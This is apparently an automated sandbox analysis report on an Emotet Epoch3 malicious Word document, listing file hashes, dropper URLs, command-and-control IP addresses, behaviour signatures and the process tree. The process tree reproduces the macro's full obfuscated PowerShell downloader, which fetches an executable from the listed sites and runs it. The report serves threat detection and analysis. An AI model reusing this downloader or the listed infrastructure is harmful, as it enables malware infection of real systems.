Analysis

  • max time kernel
    49s
  • max time network
    27s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    29-10-2020 16:13

General

  • Target

    emotet_e3_683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b_2020-10-29__161255577856._doc.doc

  • Size

    227KB

  • MD5

    9302cda391554ab9cd2a2012057bbd93

  • SHA1

    73a9ace74211841912ee09399de898b221e47bf3

  • SHA256

    683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b

  • SHA512

    3496a3261ddccd2ebc8c6b4c4451a9adcac348d38112a1fda76ec1c6886ecc0ab92eefbb8db78be5a03463de4b596182adeeaa21e62a0f82348df5e90df8057a

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/

exe.dropper

https://homewatchamelia.com/wp-admin/qmK/

exe.dropper

https://seramporemunicipality.org/replacement-vin/Ql4R/

exe.dropper

https://imperfectdream.com/wp-content/xb2csjPW6/

exe.dropper

https://mayxaycafe.net/wp-includes/UxdWFzYQj/

exe.dropper

https://420extracts.ca/cgi-bin/Ecv/

exe.dropper

https://casinopalacett.com/wp-admin/voZDArg/

Extracted

Family

emotet

Botnet

Epoch3

C2

152.32.75.74:443

91.121.200.35:8080

159.203.16.11:8080

188.226.165.170:8080

139.59.61.215:443

78.90.78.210:80

179.5.118.12:80

202.29.237.113:8080

5.79.70.250:8080

185.80.172.199:80

47.154.85.229:80

198.20.228.9:8080

85.246.78.192:80

190.212.140.6:80

181.59.59.54:80

115.79.59.157:80

54.38.143.245:8080

42.200.96.63:80

5.12.246.155:80

74.208.173.91:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_683573224327e8cecc5d38f690c4598f52ece7bd878b05e7f279111680604d5b_2020-10-29__161255577856._doc.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1084
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD     $ 8 P 4 v c u   =     [ t y P e ] ( " { 5 } { 2 } { 0 } { 3 } { 1 } { 4 } "   - f   ' M . i ' , ' O ' , ' y s t e ' , ' O . d I r e c t ' , ' R y ' , ' S ' )     ;     S e T   L s V 0   ( [ t Y p e ] ( " { 5 } { 0 } { 3 } { 1 } { 2 } { 4 } { 6 } "   - F ' . N E ' , ' V ' , ' I c E p ' , ' T . S e R ' , ' o I n T m A n A G ' , ' s Y S T e M ' , ' e r ' )     )   ;     $ R l r k j n w = ( ' Q r ' + ( ' 1 r u ' + ' 9 y ' ) ) ; $ D 7 q z 3 2 b = $ W a 6 r e a 4   +   [ c h a r ] ( 6 4 )   +   $ D e h v 6 7 3 ; $ O 5 a q k 3 g = ( ' X ' + ' a 7 ' + ( ' q 3 h ' + ' 0 ' ) ) ;   ( d I r   ( ' V A R i A b l e : 8 ' + ' P 4 ' + ' V ' + ' c u ' ) ) . v a l u E : : " c r e ` A T e D ` I R e C T ` o R Y " ( $ H O M E   +   ( ( ' { 0 } N s c ' + ( ' s ' + ' 8 r ' ) + ' y { 0 } ' + ( ' S 9 t ' + ' 4 g _ ' ) + ' l ' + ' { ' + ' 0 } ' )   - F   [ C H A r ] 9 2 ) ) ; $ G a 8 f f 5 s = ( ( ' N f f ' + ' e f b ' ) + ' g ' ) ;     $ l S v 0 : : " s E ` c U ` R i t ` y P r o T o C O l "   =   ( ' T ' + ( ' l ' + ' s 1 2 ' ) ) ; $ R u 8 1 8 i i = ( ( ' V ' + ' z v d e n ' ) + ' v ' ) ; $ G 9 p o _ g t   =   ( ' E p ' + ' l ' + ( ' 6 _ w a 2 ' + ' m ' ) ) ; $ Y f w b a 6 6 = ( ( ' T h ' + ' l ' ) + ' i ' + ( ' 7 ' + ' b 3 ' ) ) ; $ I r i o u f u = ( ( ' Y 2 ' + ' 2 ' ) + ' l ' + ( ' 3 ' + ' c t ' ) ) ; $ L l o 6 n _ w = $ H O M E + ( ( ' { ' + ' 0 } N s ' + ' c s 8 r y { 0 ' + ' } S ' + ' 9 ' + ' t 4 g _ l { 0 } ' )   - F   [ C h A R ] 9 2 ) + $ G 9 p o _ g t + ( ' . ' + ( ' e ' + ' x e ' ) ) ; $ J v j d s 4 y = ( ( ' G _ w n ' + ' x ' ) + ' 9 u ' ) ; $ H 5 x r 5 l m = . ( ' n ' + ' e w - o b j e c ' + ' t ' )   n E t . w e b c L I E N t ; $ M m o 4 1 v n = ( ( ( ( ' h ' + ' t t ' + ' p s : ] [   1 )   j j k ' + ' g ' + ' S   ' ) ) + ' [ ' + ( ' ]   ' + ' [ ] ' ) + ( ( ' w ] [   ' + ' 1 )   ' ) ) + ( ' j j k ' + ' g ' ) + ( ' S ' + '   [ ] ' ) + ( '   [ ] ' + ' w ' ) + ( ' e n j ' + ' o y m ' ) + ' y l ' + ' i ' + ( ' f ' + ' e c h e r y ' ) + ( ' l . ' + ' c ' ) + ( ' o ' + ' m ] ' ) + ' [ ' + '   ' + ( ( ' 1 )   ' + ' j ' ) ) + ' j ' + ' k g ' + ( ( ' S ' + '   [ ] ' + '   [ ] w ' + ' w p - i n c l u d ' + ' e s ] ' + ' [   1 )   j j ' + ' k g S ' + '   ' ) ) + ' [ ' + ( ' ] ' + '   [ ' ) + ( ' ] w ' + ' F P ' + ' N x o U i ' ) + ' C ' + ' z ' + ' 3 ' + ' ] ' + ' [   ' + ( ( ' 1 ) ' + '   j ' + ' j k ' ) ) + ( ' g ' + ' S   ' + ' [ ]   [ ' ) + ' ] ' + ' w ' + ' @ ' + ' h t ' + ( ' t p ' + ' s ' ) + ' : ' + ( ' ] [ ' + '   1 ' ) + ( ( ' ) ' + '   j ' ) ) + ( ' j k ' + ' g S   ' ) + ' [ ] ' + ( '   [ ' + ' ] w ] ' ) + ( ' [ ' + '   1 ' ) + ( ( ' )   j ' + ' j k ' ) ) + ' g ' + ( ' S   ' + ' [ ' + ' ]   [ ] ' + ' w h ' ) + ' o m ' + ( ' e ' + ' w a t c ' + ' h a m ' ) + ( ' e l i ' + ' a . ' ) + ' c o ' + ( ' m ] ' + ' [   1 ' ) + ( ( ' )   ' + ' j j k g ' ) ) + ' S ' + ( '   ' + ' [ ]   [ ] w w ' + ' p - ' ) + ' a ' + ' d m ' + ' i ' + ( ' n ' + ' ] [ ' ) + ( ( '   1 ) ' + '   j j k ' + ' g S   [ ' ) ) + ( ' ]   [ ] ' + ' w ' + ' q ' ) + ' m ' + ( ' K ] ' + ' [   ' ) + ( ( ' 1 ) ' + '   j j k g ' + ' S ' + '   ' ) ) + ' [ ] ' + ( '   [ ] ' + ' w @ h t ' ) + ( ( ' t p s : ] [   1 ' + ' ) ' + '   ' ) ) + ( ' j j ' + ' k ' ) + ( ' g ' + ' S   ' ) + ( ' [ ]   ' + ' [ ' ) + ' ] ' + ' w ] ' + ( ' [ ' + '   1 ' ) + ( ( ' )   ' ) ) + ( ' j j k g ' + ' S   [ ' ) + ( ' ]   [ ] ' + ' w s e ' ) + ' r a ' + ( ' m p o ' + ' r ' ) + ' e ' + ' m ' + ( ' u ' + ' n i c i p ' + ' a l ' ) + ( ' i ' + ' t y . ' ) + ( ' o r g ] ' + ' [   ' ) + ' 1 ' + ( ( ' ) ' + '   j j k g ' ) ) + ( ' S   ' + ' [ ]   [ ' ) + ( ' ] ' + ' w ' + ' r e p l a ' ) + ' c ' + ' e m ' + ( ' e ' + ' n t - v i n ] ' ) + ' [   ' + ( ( ' 1 ' + ' )   j j ' ) ) + ( ' k g ' + ' S ' ) + ( '   ' + ' [ ] ' ) + '   [ ' + ' ] ' + ( ' w ' + ' Q l 4 R ] ' + ' [   ' ) + ( ( ' 1 ) ' + '   j j ' ) ) + ' k ' + ' g ' + ( ' S   ' + ' [ ]   ' ) + ( ' [ ' + ' ] w @ ' ) + ' h ' + ' t ' + ( ' t p s : ] ' + ' [ ' ) + ( ( '   1 )   j j ' + ' k ' + ' g S   [ ' + ' ]   [ ' ) ) + ( ( ' ] ' + ' w ] [ ' + '   1 )   ' + ' j j k ' + ' g S ' + '   [ ]   [ ' ) ) + ( ' ] w i m ' + ' p ' + ' e ' ) + ( ' r f e c ' + ' t d ' ) + ( ' r e a ' + ' m . c ' ) + ( ( ' o m ] [   ' + ' 1 )   j j k ' + ' g S   [ ' + ' ]   [ ' ) ) + ' ] ' + ( ' w w ' + ' p - ' ) + ( ' c o ' + ' n t e ' + ' n t ] ' ) + ' [ ' + '   ' + ( ( ' 1 ) ' + '   j j ' ) ) + ( ' k g ' + ' S   [ ] ' ) + ( '   [ ] w ' + ' x ' ) + ( ' b 2 ' + ' c ' ) + ' s j ' + ( ' P ' + ' W 6 ' ) + ' ] [ ' + ( ( '   1 )   ' + ' j j ' ) ) + ' k g ' + ( ' S   [ ' + ' ]   ' ) + ( ' [ ] ' + ' w @ h t ' + ' t p ' ) + ' s : ' + ( ' ] ' + ' [   1 ' ) + ' ) ' + ( '   j ' + ' j k g ' ) + ' S   ' + ( ' [ ]   ' + ' [ ] ' ) + ( ' w ] ' + ' [ ' ) + ( ( '   1 ' + ' )   j j ' + ' k g ' ) ) + ' S   ' + ' [ ] ' + '   [ ' + ( ' ] ' + ' w m a ' ) + ( ' y x a ' + ' y c ' ) + ( ( ' a f e . n ' + ' e t ] [ ' + '   1 )   ' + ' j ' ) ) + ' j ' + ( ' k ' + ' g S ' ) + ( '   [ ] ' + '   ' ) + ( ' [ ] w w ' + ' p - i n c l u ' + ' d e ' ) + ( ( ' s ] ' + ' [   1 )   j j ' + ' k ' ) ) + ( ' g S   ' + ' [ ' ) + ( ' ]   [ ' + ' ] w U ' ) + ( ' x ' + ' d W F ' ) + ( ' z ' + ' Y Q ' ) + ( ' j ] ' + ' [ ' ) + ( ( '   1 )   ' + ' j ' ) ) + ( ' j k g ' + ' S   [ ]   ' + ' [ ] ' ) + ' w @ ' + ' h ' + ' t t ' + ' p ' + ( ' s ' + ' : ] ' ) + ( ( ' [ ' + '   1 )   j ' ) ) + ( ' j ' + ' k g ' ) + ( ' S   [ ' + ' ] ' ) + ( '   [ ' + ' ] w ] ' ) + ( ( ' [   1 )   ' + ' j ' ) ) + ' j ' + ' k ' + ( ' g S   [ ' + ' ] ' + '   [ ] ' + ' w 4 2 0 ' + ' e x t r a ' ) + ( ' c ' + ' t s ' ) + ( ( ' . c a ' + ' ] [ ' + '   1 )   ' ) ) + ( ' j j k ' + ' g ' ) + ( ' S   [ ]   ' + ' [ ] w c ' + ' g ' ) + ( ' i ' + ' - b i ' ) + ( ( ' n ] [ ' + '   ' + ' 1 ) ' ) ) + '   j ' + ' j k ' + ' g ' + ( ' S   ' + ' [ ]   [ ] ' + ' w ' ) + ( ( ' E c v ] [   ' + ' 1 ) ' ) ) + ( '   ' + ' j j ' + ' k g S   ' ) + ( ' [ ]   [ ' + ' ] ' + ' w ' ) + ( ' @ h t t p s ' + ' : ] ' ) + ' [   ' + ( ( ' 1 )   j j ' + ' k g S ' ) ) + '   ' + ' [ ] ' + ( '   ' + ' [ ] w ] ' ) + ' [ ' + '   ' + ( ( ' 1 )   j j ' + ' k ' ) ) + ( ' g S   ' + ' [ ]   [ ' + ' ] w ' ) + ( ' c a ' + ' s ' ) + ( ' i n ' + ' o p ' ) + ( ' a l ' + ' a ' ) + ' c e ' + ( ' t t . ' + ' c o m ] [ ' ) + '   ' + ' 1 ' + ( ( ' ) ' + '   j ' ) ) + ' j ' + ( ' k g ' + ' S   [ ] ' ) + ( '   [ ] ' + ' w w ' ) + ( ' p - ' + ' a d ' + ' m i ' ) + ' n ' + ( ( ' ] [ ' + '   1 )   j ' + ' j ' ) ) + ( ' k g S ' + '   [ ' ) + ( ' ]   ' + ' [ ] w ' ) + ' v ' + ' o ' + ' Z D ' + ' A ' + ( ( ' r ' + ' g ] [   ' + ' 1 )   ' ) ) + ( ' j j ' + ' k ' ) + ' g ' + ( ' S   ' + ' [ ' ) + ( ' ]   ' + ' [ ' ) + ' ] ' + ' w ' ) ) . " r ` E P ` L a c e " ( ( ( ( ' ] [ ' + '   1 ' ) + ( ( ' )   j ' + ' j k g S ' + '   [ ' ) ) + ' ]   ' + ' [ ] ' + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " s P l ` I t " ( $ C h k u t 9 4   +   $ D 7 q z 3 2 b   +   $ O p d k e t n ) ; $ R f 7 k 3 z k = ( ' U ' + ' s ' + ( ' f ' + ' u t h v ' ) ) ; f o r e a c h   ( $ U h b k d 7 k   i n   $ M m o 4 1 v n ) { t r y { $ H 5 x r 5 l m . " d O ` w n l ` O a ` D f I l E " ( $ U h b k d 7 k ,   $ L l o 6 n _ w ) ; $ F s i u 4 _ x = ( ( ' U ' + ' r t ' ) + ( ' d z o ' + ' x ' ) ) ; I f   ( ( . ( ' G e t - I ' + ' t e ' + ' m ' )   $ L l o 6 n _ w ) . " L e n ` G T h "   - g e   4 4 2 6 3 )   { ( [ w m i c l a s s ] ( ' w ' + ( ' i ' + ' n 3 2 ' ) + ( ' _ P ' + ' r ' + ' o c e s s ' ) ) ) . " C r e ` A ` T e " ( $ L l o 6 n _ w ) ; $ Y z r c j r o = ( ( ' T 2 ' + ' a 4 ' ) + ' i ' + ' j n ' ) ; b r e a k ; $ C c w k 5 7 z = ( ' L s ' + ( ' l f h 6 ' + ' p ' ) ) } } c a t c h { } } $ L 9 w t d 0 0 = ( ( ' V ' + ' x b i ' ) + ' w ' + ' x u ' ) 
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:540
  • C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exe
    C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3852
    • C:\Windows\SysWOW64\D3D12\pnrpnsp.exe
      "C:\Windows\SysWOW64\D3D12\pnrpnsp.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:3952
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
    1⤵
      PID:3680
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
      1⤵
        PID:192
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
        1⤵
        • Modifies data under HKEY_USERS
        PID:684

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exe
        MD5

        77939d1dbf57fb7b4c79d36f45e46080

        SHA1

        1d276443f0382b6a6c65cf84624b7bb37c2e1304

        SHA256

        b719f832779494f20eddd4be65384d4c2a026d0ed401057f1563dd9847ab93ba

        SHA512

        63e13a56f9b9377f49a1fb856fea5ec3915fedc4bb3c4eb1945293c7ae79a7c097d9822185fbb7432573383e84c984e94caf857fbf7987f02d0f0e9c4ae0eb13

      • C:\Users\Admin\Nscs8ry\S9t4g_l\Epl6_wa2m.exe
        MD5

        77939d1dbf57fb7b4c79d36f45e46080

        SHA1

        1d276443f0382b6a6c65cf84624b7bb37c2e1304

        SHA256

        b719f832779494f20eddd4be65384d4c2a026d0ed401057f1563dd9847ab93ba

        SHA512

        63e13a56f9b9377f49a1fb856fea5ec3915fedc4bb3c4eb1945293c7ae79a7c097d9822185fbb7432573383e84c984e94caf857fbf7987f02d0f0e9c4ae0eb13

      • C:\Windows\SysWOW64\D3D12\pnrpnsp.exe
        MD5

        77939d1dbf57fb7b4c79d36f45e46080

        SHA1

        1d276443f0382b6a6c65cf84624b7bb37c2e1304

        SHA256

        b719f832779494f20eddd4be65384d4c2a026d0ed401057f1563dd9847ab93ba

        SHA512

        63e13a56f9b9377f49a1fb856fea5ec3915fedc4bb3c4eb1945293c7ae79a7c097d9822185fbb7432573383e84c984e94caf857fbf7987f02d0f0e9c4ae0eb13

      • memory/540-8-0x00000199DB6A0000-0x00000199DB6A1000-memory.dmp
        Filesize

        4KB

      • memory/540-9-0x00000199DBA00000-0x00000199DBA01000-memory.dmp
        Filesize

        4KB

      • memory/540-7-0x00007FFE61390000-0x00007FFE61D7C000-memory.dmp
        Filesize

        9.9MB

      • memory/1084-0-0x000002C0AED40000-0x000002C0AF377000-memory.dmp
        Filesize

        6.2MB

      • memory/1084-5-0x000002C0B7AF0000-0x000002C0B7AF5000-memory.dmp
        Filesize

        20KB

      • memory/3852-12-0x0000000000510000-0x0000000000522000-memory.dmp
        Filesize

        72KB

      • memory/3852-13-0x00000000021F0000-0x0000000002200000-memory.dmp
        Filesize

        64KB

      • memory/3952-14-0x0000000000000000-mapping.dmp
      • memory/3952-16-0x0000000000490000-0x00000000004A2000-memory.dmp
        Filesize

        72KB

      • memory/3952-17-0x0000000000500000-0x0000000000510000-memory.dmp
        Filesize

        64KB